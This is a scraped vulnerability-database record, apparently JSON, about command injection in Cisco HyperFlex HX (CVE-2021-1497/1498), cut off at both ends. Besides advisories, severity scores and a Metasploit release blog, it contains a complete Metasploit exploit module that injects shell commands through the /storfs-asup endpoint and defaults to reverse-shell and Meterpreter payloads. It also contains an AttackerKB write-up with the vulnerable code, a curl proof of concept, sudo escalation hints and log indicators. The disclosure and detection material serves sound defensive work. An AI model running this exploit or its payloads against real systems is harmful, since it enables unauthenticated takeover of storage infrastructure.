"AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2021-12-22T01:23:55", "description": "This Metasploit module exploits an unauthenticated command injection in Cisco HyperFlex HX Data Platform's /storfs-asup endpoint to execute shell commands as the Tomcat user.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-06-04T00:00:00", "type": "zdt", 
"title": "Cisco HyperFlex HX Data Platform Command Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1498", "CVE-2021-1497"], "modified": "2021-06-04T00:00:00", "id": "1337DAY-ID-36357", "href": "https://0day.today/exploit/description/36357", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Cisco HyperFlex HX Data Platform Command Execution',\n 'Description' => %q{\n This module exploits an unauthenticated command injection in Cisco\n HyperFlex HX Data Platform's /storfs-asup endpoint to execute shell\n commands as the Tomcat user.\n },\n 'Author' => [\n 'Nikita Abramov', # Discovery\n 'Mikhail Klyuchnikov', # Discovery\n 'wvu' # Analysis and exploit\n ],\n 'References' => [\n ['CVE', '2021-1497'], # HyperFlex HX Data Platform Installer\n ['CVE', '2021-1498'], # HyperFlex HX Data Platform\n ['URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-hyperflex-rce-TjjNrkpR'],\n ['URL', 'https://attackerkb.com/assessments/4f532147-b27b-4079-aed1-5cfdc402cf5c'],\n ['URL', 'https://twitter.com/ptswarm/status/1390300625129201664']\n ],\n 'DisclosureDate' 
=> '2021-05-05',\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => false, # Privesc left as an exercise for the reader\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_python_ssl'\n }\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n\n register_advanced_options([\n OptFloat.new('CmdExecTimeout', [true, 'Command execution timeout', 3.5])\n ])\n end\n\n def check\n res = send_request_cgi(\n 'method' => %w[GET POST].sample,\n 'uri' => normalize_uri(target_uri.path, 'storfs-asup')\n )\n\n return CheckCode::Unknown unless res\n\n unless res.code == 200 &&\n res.body.include?('Action for the servlet need be specified.')\n return CheckCode::Safe\n end\n\n CheckCode::Vulnerable('Storfs ASUP servlet detected.')\n end\n\n def exploit\n print_status(\"Selected #{payload_instance.refname} (#{target.name})\")\n\n case target['Type']\n when :unix_cmd\n execute_command(payload.encoded)\n when :linux_dropper\n execute_cmdstager\n end\n end\n\n def execute_command(cmd, _opts = {})\n print_status(\"Executing command: #{cmd}\")\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'storfs-asup'),\n 'vars_post' => {\n 'action' => Faker::Hacker.verb,\n %w[token mode].sample => \"$(#{cmd})\"\n }\n }, datastore['CmdExecTimeout'])\n\n unless res\n print_warning('Command execution timed out')\n return\n end\n\n unless res.code == 200\n 
fail_with(Failure::PayloadFailed, 'Failed to execute command')\n end\n\n print_good('Successfully executed command')\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/36357", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:31:07", "description": "A remote command execution vulnerability exists in Cisco Hyperflex. The vulnerability is due to improper input sanitization.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-06-20T00:00:00", "type": "checkpoint_advisories", "title": "Cisco HyperFlex HX Command Injection (CVE-2021-1498; CVE-2021-1497)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1497", "CVE-2021-1498"], "modified": "2021-11-17T00:00:00", "id": "CPAI-2021-0416", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T15:12:13", "description": "A command injection vulnerability exists in Cisco HyperFlex HX. 
Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary commands on the affected system.", "cvss3": {}, "published": "2022-06-16T00:00:00", "type": "checkpoint_advisories", "title": "Cisco HyperFlex HX Command Injection (CVE-2021-1497)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-1497"], "modified": "2022-06-16T00:00:00", "id": "CPAI-2022-0284", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}], "rapid7blog": [{"lastseen": "2021-06-12T01:03:26", "description": "## NSClient++\n\n\n\nCommunity contributor Yann Castel has contributed an exploit module for NSClient++ which targets an authenticated command execution vulnerability. Users that are able to authenticate to the service as admin can leverage the external scripts feature to execute commands with SYSTEM level privileges. This allows the underlying server to be compromised. Castel is also working on another exploit module for NSClient++ which happens to be a local privilege escalation so stay tuned for more NSClient++ content.\n\n## REDIS Improvements\n\nCommunity member Smashery returned to improve the Framework\u2019s REDIS dumping capabilities. This week two bugs were fixed to ensure that REDIS data can be more easily accessed using the `auxiliary/gather/redis_extractor` module. This module has seen a number of improvements lately and is capable of dumping data from both authenticated and unauthenticated instances.\n\n## POST API Improvements\n\nGoogle Summer of Code student and community member pingport80 has been hard at work making a number of improvements to the POST API used by modules to interact with sessions. The bulk of the improvements have been focused on closing feature gaps in various scenarios. One excellent example of this is the new Process library that allows both shell and Meterpreter sessions to enumerate running processes on multiple platforms. 
This makes it easier for module developers to write content without worrying about the different capabilities of the various session types.\n\nPingport80 has also been testing various scenarios to find issues related to localization. This has involved finding instances where error messages that are assumed to be in English are used to determine various outcomes and updating them to function regardless of the underlying locale.\n\n## New module content (2)\n\n * [Cisco HyperFlex HX Data Platform Command Execution](<https://github.com/rapid7/metasploit-framework/pull/15281>) by [wvu](<https://github.com/wvu-r7>), Mikhail Klyuchnikov, and Nikita Abramov, which exploits [CVE-2021-1498](<https://attackerkb.com/topics/V6mTqsTWkw/cve-2021-1498?referrer=blog>) \\- Added an exploit for [CVE-2021-1497](<https://attackerkb.com/topics/mDqlWhQovO/cve-2021-1497?referrer=msfReleaseNotes>)/[CVE-2021-1498](<https://attackerkb.com/topics/V6mTqsTWkw/cve-2021-1498?referrer=msfReleaseNotes>), a command injection in Cisco HyperFlex HX Data Platform.\n * [NSClient++ 0.5.2.35 - ExternalScripts Authenticated Remote Code Execution](<https://github.com/rapid7/metasploit-framework/pull/15305>) by [Yann Castel](<https://github.com/Hakyac>) and kindredsec - This module allows an attacker with knowledge of the admin password of NSClient++ 0.5.2.35 to start a privilege reverse shell, so long as the attacker has the admin password, and the NSClient++has both the web interface and ExternalScripts feature enabled.\n\n## Enhancements and features\n\n * [#15296](<https://github.com/rapid7/metasploit-framework/pull/15296>) from [pingport80](<https://github.com/pingport80>) \\- The `command_exists?` method inside `post/common.rb` has been updated to fall back to using the `which` command to check if a command exists on a target system if `command -v` fails to run successfully. 
This allows users to check whether a command exists or not on systems that might not contain a `command` command, such as ESXi.\n * [#15299](<https://github.com/rapid7/metasploit-framework/pull/15299>) from [todb-r7](<https://github.com/todb-r7>) \\- The CONTRIBUTING.md documentation has been updated to include additional information on how to request CVEs for vulnerabilities from Rapid7.\n\n## Bugs fixed\n\n * [#15257](<https://github.com/rapid7/metasploit-framework/pull/15257>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- The ` lib/msf/core/post_mixin.rb` library has been updated to correctly check if missing Meterpreter command IDs are core command IDs or an extension command ID and provide appropriate feedback to end users about this incompatibility. This also fixes an issue where Meterpreter might complain that it couldn't load an extension but wouldn't display what the extension was.\n * [#15284](<https://github.com/rapid7/metasploit-framework/pull/15284>) from [pingport80](<https://github.com/pingport80>) \\- This fixes a localization-related issue in the `post/linux/gather/pptpd_chap_secrets` module. If the file is unreadable, Metasploit would treat the permission denied error as the contents.\n * [#15290](<https://github.com/rapid7/metasploit-framework/pull/15290>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- Invalid Meterpeter command requirements in mixins no longer raise a Runtime error.\n * [#15293](<https://github.com/rapid7/metasploit-framework/pull/15293>) from [smashery](<https://github.com/smashery>) \\- This fixes two bugs in the Redis extractor module. The first was an issue that would occur when a value was excessively large. 
The second was a race condition that could be encountered if the server was being actively used by a third-party.\n * [#15312](<https://github.com/rapid7/metasploit-framework/pull/15312>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Ensures that msfconsole now supports setting both `RHOST` and `RHOSTS` interchangeably for all scenarios and modules\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.0.47...6.0.48](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-06-03T10%3A14%3A41-05%3A00..2021-06-10T14%3A21%3A04%2B01%3A00%22>)\n * [Full diff 6.0.47...6.0.48](<https://github.com/rapid7/metasploit-framework/compare/6.0.47...6.0.48>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {}, "published": "2021-06-11T19:51:35", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-1497", "CVE-2021-1498"], "modified": "2021-06-11T19:51:35", "id": "RAPID7BLOG:23D7FEEF87EC80463CD4EDB1EA568128", "href": "https://blog.rapid7.com/2021/06/11/metasploit-wrap-up-116/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2023-01-29T05:12:45", "description": "Multiple vulnerabilities in the web-based management interface of Cisco HyperFlex HX could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. 
For more information about these vulnerabilities, see the Details section of this advisory.\n\n \n**Recent assessments:** \n \n**wvu-r7** at May 18, 2021 12:18am UTC reported:\n\n_Attacker value is a little lower because I was able to test only the installer._\n\n# CVE-2021-1497/CVE-2021-1498\n\nCommand injection in the `/storfs-asup` endpoint\u2019s `token` and `mode` parameters.\n\n## Patch\n \n \n --- unpatched/web.xml\t2021-05-17 19:06:17.000000000 -0500\n +++ patched/web.xml\t2021-05-17 19:06:23.000000000 -0500\n 
@@ -69,17 +69,6 @@\n \t</servlet-mapping>\n \n \t<servlet>\n -\t\t<servlet-name>Springpath Storfs ASUP</servlet-name>\n -\t\t<servlet-class>com.storvisor.sysmgmt.service.StorfsAsup</servlet-class>\n -\t\t<load-on-startup>1</load-on-startup>\n -\t</servlet>\n -\n -\t<servlet-mapping>\n -\t\t<servlet-name>Springpath Storfs ASUP</servlet-name>\n -\t\t<url-pattern>/storfs-asup/*</url-pattern>\n -\t</servlet-mapping>\n -\n -\t<servlet>\n \t\t<servlet-name>Springpath Upgrade Image Upload Service</servlet-name>\n \t\t<servlet-class>com.storvisor.sysmgmt.service.StorvisorFileUploader</servlet-class>\n \t</servlet>\n \n\n## Vulnerability\n \n \n protected void processRequest(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {\n String action = request.getParameter(\"action\");\n if (action == null) {\n String msg = \"Action for the servlet need be specified.\";\n writeErrorResponse(response, msg);\n return;\n }\n try {\n String token = request.getParameter(\"token\");\n StringBuilder cmd = new StringBuilder();\n cmd.append(\"exec /bin/storfs-asup \");\n cmd.append(token);\n String mode = request.getParameter(\"mode\");\n cmd.append(\" \");\n cmd.append(mode);\n cmd.append(\" > /dev/null\");\n logger.info(\"storfs-asup cmd to run : \" + cmd);\n ProcessBuilder pb = new ProcessBuilder(new String[] { \"/bin/bash\", \"-c\", cmd.toString() });\n logger.info(\"Starting the storfs-asup now: \");\n long startTime = System.currentTimeMillis();\n Process p = pb.start();\n InputStream errStream = p.getErrorStream();\n String errMsg = FileUtils.readToString(errStream);\n int exitCode = p.waitFor();\n long timeTaken = System.currentTimeMillis() - startTime;\n logger.info(\"storfs-asup command completed in (\" + timeTaken + \" ) milliseconds, with exit code (\" + exitCode + \") and error message: \" + errMsg);\n errStream.close();\n OutputStream outStream = p.getOutputStream();\n outStream.flush();\n outStream.close();\n if (exitCode != 0)\n 
throw new Exception(errMsg);\n } catch (IOException ex) {\n logger.error(\"Failed to generate asup: \" + ex);\n } catch (Exception ie) {\n logger.error(\"Failed to run the /bin/storfs-asup command.\");\n } finally {\n logger.info(\"Done executing asup command. \");\n }\n }\n \n \n \n tomcat7@HyperFlex-Installer-4:~$ sudo -l\n Matching Defaults entries for tomcat7 on HyperFlex-Installer-4:\n !lecture, tty_tickets, !fqdn\n \n User tomcat7 may run the following commands on HyperFlex-Installer-4:\n (ALL) NOPASSWD: /opt/springpath/storfs-support/support.py\n (ALL) NOPASSWD: /opt/springpath/storfs-asup/generate_asup.sh\n (ALL) NOPASSWD: /opt/springpath/storfs-asup/generate_sch.sh\n tomcat7@HyperFlex-Installer-4:~$ sudo /opt/springpath/storfs-support/support.py --help\n Usage: support.py [options]\n \n Options:\n -h, --help show this help message and exit\n -t TARGET, --target=TARGET\n Target directory where the support bundle should go\n (XXX: This could be a remote host(dir), ex:\n hostname:/foo). Optional. Default = /tmp\n -i INSTALLDIR, --installdir=INSTALLDIR\n Install directory for storfs. Optional.\n -k ZKDIR, --zkdir=ZKDIR\n zookeeper directory for storfs. Optional\n -l LOGDIR, --logdir=LOGDIR\n log directory for storfs. Optional\n --asupdir=ASUPDIR asup directory for storfs. Optional\n -c COREDIR, --coredir=COREDIR\n core directory for storfs. Optional\n -m MANIFESTDIR, --manifestdir=MANIFESTDIR\n Manifest directory for storfs support. All files with\n .mfx extension in this directory will be processed.\n Optional\n --list List the manifests. Optional\n -f MANIFESTFILES, --manifest-file=MANIFESTFILES\n Manifest file to use for generating support. Multiple\n manifest files can be specified. Manifests files are\n required to have .mfx suffix. Optional (Cannot be with\n -m option)\n -e TOOLSEXEDIR, --toolsexedir=TOOLSEXEDIR\n log directory for storfs binary files. Optional\n --hypervdir=HYPERVDIR\n log directory for hyperv binary files. 
Optional\n -o TOOLSDIR, --toolsdir=TOOLSDIR\n Path for storfs tools. Optional\n -r RUNTIMEDIR, --runtimedir=RUNTIMEDIR\n Path for runtime dir (which contains\n storfs_running_process.pid files). Optional\n -b BUILDTYPE, --buildtype=BUILDTYPE\n Build type that was running. Optional. Default = debug\n -a ADDITIONAL_FILES, --additional-files=ADDITIONAL_FILES\n any additional files/directories (not in manifest)\n that should be added to the support bundle. Optional.\n --dry-run Process manifests to make sure that there are no\n errors\n tomcat7@HyperFlex-Installer-4:~$ ls /opt/springpath/storfs-support/*.mfx\n /opt/springpath/storfs-support/springpath-basic.mfx /opt/springpath/storfs-support/springpath-zookeeper-no-db.mfx\n /opt/springpath/storfs-support/springpath.mfx /opt/springpath/storfs-support/springpath-logs.mfx\n /opt/springpath/storfs-support/springpath-default-os.mfx /opt/springpath/storfs-support/springpath-extended.mfx\n /opt/springpath/storfs-support/springpath-default-asup.mfx /opt/springpath/storfs-support/deployment.mfx\n /opt/springpath/storfs-support/springpath-mgmt.mfx /opt/springpath/storfs-support/springpath-witness.mfx\n /opt/springpath/storfs-support/springpath-default-asup-cli-esx.mfx /opt/springpath/storfs-support/springpath-default-asup-hyperv.mfx\n /opt/springpath/storfs-support/springpath-zookeeper.mfx /opt/springpath/storfs-support/springpath-default-asup-esx.mfx\n /opt/springpath/storfs-support/springpath-default-event-asup.mfx /opt/springpath/storfs-support/springpath-perf.mfx\n /opt/springpath/storfs-support/springpath-default-asup-cli-hyperv.mfx /opt/springpath/storfs-support/springpath-exhaustive.mfx\n tomcat7@HyperFlex-Installer-4:~$ head /opt/springpath/storfs-support/springpath-basic.mfx\n # Springpath manifest file. 
Contains just basic logs.\n # Simplified from springpath-mgmt.mfx\n [\"copy\", \"TIMEOUT_NONE\", \"IGNORE_ERROR\", \"/var/jail/var/log/springpath\"]\n [\"copy\", \"TIMEOUT_NONE\", \"IGNORE_ERROR\", \"/etc/iptables_node_cluster.rules\"]\n [\"exec\", \"TIMEOUT_NONE\", \"IGNORE_ERROR\", \"iptables --list -n -v\"]\n [\"exec\", \"TIMEOUT_NONE\", \"IGNORE_ERROR\", \"bom-check.sh\"]\n [\"exec\", \"TIMEOUT=120\", \"IGNORE_ERROR\", \"mstcli cluster diag\"]\n [\"exec\", \"TIMEOUT=45\", \"IGNORE_ERROR\", \"mstcli cluster info\"]\n [\"exec\", \"TIMEOUT=45\", \"IGNORE_ERROR\", \"mstcli appliance list\"]\n [\"exec\", \"TIMEOUT=45\", \"IGNORE_ERROR\", \"mstcli datastore list\"]\n tomcat7@HyperFlex-Installer-4:~$\n \n\n## PoC\n \n \n wvu@kharak:~$ curl -v http://192.168.123.133/storfs-asup -d 'action=&token=`id`&mode=`id`'\n * Trying 192.168.123.133...\n * TCP_NODELAY set\n * Connected to 192.168.123.133 (192.168.123.133) port 80 (#0)\n > POST /storfs-asup HTTP/1.1\n > Host: 192.168.123.133\n > User-Agent: curl/7.64.1\n > Accept: */*\n > Content-Length: 28\n > Content-Type: application/x-www-form-urlencoded\n >\n * upload completely sent off: 28 out of 28 bytes\n < HTTP/1.1 200 OK\n < Server: nginx/1.8.1\n < Date: Tue, 18 May 2021 00:54:26 GMT\n < Content-Length: 0\n < Connection: keep-alive\n < Front-End-Https: on\n <\n * Connection #0 to host 192.168.123.133 left intact\n * Closing connection 0\n wvu@kharak:~$\n \n\n## IOCs\n \n \n ==> /var/log/nginx/access.log <==\n 192.168.123.1 - - [17/May/2021:17:54:26 -0700] \"POST /storfs-asup HTTP/1.1\" 200 0 \"-\" \"curl/7.64.1\"\n \n ==> /var/log/springpath/stBootstrapGuiBackend.log <==\n 2021-05-18-00:54:26.012 [tomcat-http-2] INFO com.storvisor.sysmgmt.service.StorfsAsup.processRequest():59 - storfs-asup cmd to run : exec /bin/storfs-asup `id` `id` > /dev/null\n 2021-05-18-00:54:26.012 [tomcat-http-2] INFO com.storvisor.sysmgmt.service.StorfsAsup.processRequest():64 - Starting the storfs-asup now:\n 2021-05-18-00:54:26.017 
[tomcat-http-2] INFO com.storvisor.sysmgmt.service.StorfsAsup.processRequest():71 - storfs-asup command completed in (4 ) milliseconds, with exit code (127) and error message: /bin/bash: /bin/storfs-asup: No such file or directory\n 2021-05-18-00:54:26.020 [tomcat-http-2] ERROR com.storvisor.sysmgmt.service.StorfsAsup.processRequest():89 - Failed to run the /bin/storfs-asup command.\n 2021-05-18-00:54:26.020 [tomcat-http-2] INFO com.storvisor.sysmgmt.service.StorfsAsup.processRequest():91 - Done executing asup command.\n \n ==> /var/log/tomcat7/catalina.out <==\n 2021-05-18-00:54:26.012 INFO com.storvisor.sysmgmt.service.StorfsAsup:59 - storfs-asup cmd to run : exec /bin/storfs-asup `id` `id` > /dev/null\n 2021-05-18-00:54:26.012 INFO com.storvisor.sysmgmt.service.StorfsAsup:64 - Starting the storfs-asup now:\n 2021-05-18-00:54:26.017 INFO com.storvisor.sysmgmt.service.StorfsAsup:71 - storfs-asup command completed in (4 ) milliseconds, with exit code (127) and error message: /bin/bash: /bin/storfs-asup: No such file or directory\n 2021-05-18-00:54:26.020 ERROR com.storvisor.sysmgmt.service.StorfsAsup:89 - Failed to run the /bin/storfs-asup command.\n 2021-05-18-00:54:26.020 INFO com.storvisor.sysmgmt.service.StorfsAsup:91 - Done executing asup command.\n \n ==> /var/log/tomcat7/localhost_access_log.2021-05-17.txt <==\n 127.0.0.1 - - [17/May/2021:17:54:26 -0700] \"POST /storfs-asup HTTP/1.0\" 200 -\n \n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-05T00:00:00", "type": "attackerkb", 
"title": "CVE-2021-1497", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1497", "CVE-2021-1498", "CVE-2021-20090"], "modified": "2021-05-15T00:00:00", "id": "AKB:77557E97-8311-4C07-B6B7-5AE38B6A1069", "href": "https://attackerkb.com/topics/mDqlWhQovO/cve-2021-1497", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-20T11:20:12", "description": "Multiple vulnerabilities in the web-based management interface of Cisco HyperFlex HX could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. 
For more information about these vulnerabilities, see the Details section of this advisory.\n\n \n**Recent assessments:** \n \n**wvu-r7** at May 18, 2021 12:23am UTC reported:\n\nSee [CVE-2021-1497](<https://attackerkb.com/assessments/4f532147-b27b-4079-aed1-5cfdc402cf5c>).\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-05T00:00:00", "type": "attackerkb", "title": "CVE-2021-1498", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1497", "CVE-2021-1498", "CVE-2021-20090"], "modified": "2021-05-18T00:00:00", "id": "AKB:EBC58F49-1AB2-4D9F-8147-A97243DA8244", "href": "https://attackerkb.com/topics/V6mTqsTWkw/cve-2021-1498", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-03-23T12:48:25", "description": "Multiple vulnerabilities in Cisco SD-WAN vManage Software could allow an unauthenticated, remote attacker to execute arbitrary code or gain access to sensitive information, or allow an authenticated, local attacker to gain escalated privileges or gain 
unauthorized access to the application. For more information about these vulnerabilities, see the Details section of this advisory.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-05-06T13:15:00", "type": "cve", "title": "CVE-2021-1275", "cwe": ["CWE-400"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1275"], "modified": "2021-05-13T19:35:00", "cpe": [], "id": "CVE-2021-1275", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1275", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": []}, {"lastseen": "2022-10-21T21:01:23", "description": "Multiple vulnerabilities in Cisco SD-WAN vManage Software could allow an unauthenticated, remote attacker to execute arbitrary code or gain access to sensitive information, or allow an authenticated, local attacker to gain escalated privileges or gain unauthorized access to the application. 
For more information about these vulnerabilities, see the Details section of this advisory.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "type": "cve", "title": "CVE-2021-1506", "cwe": ["CWE-862"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1506"], "modified": "2022-10-21T19:43:00", "cpe": [], "id": "CVE-2021-1506", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1506", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2022-08-05T19:23:16", "description": "Multiple vulnerabilities in Cisco SD-WAN vManage Software could allow an unauthenticated, remote attacker to execute arbitrary code or gain access to sensitive information, or allow an authenticated, local attacker to gain escalated privileges or gain unauthorized access to the application. 
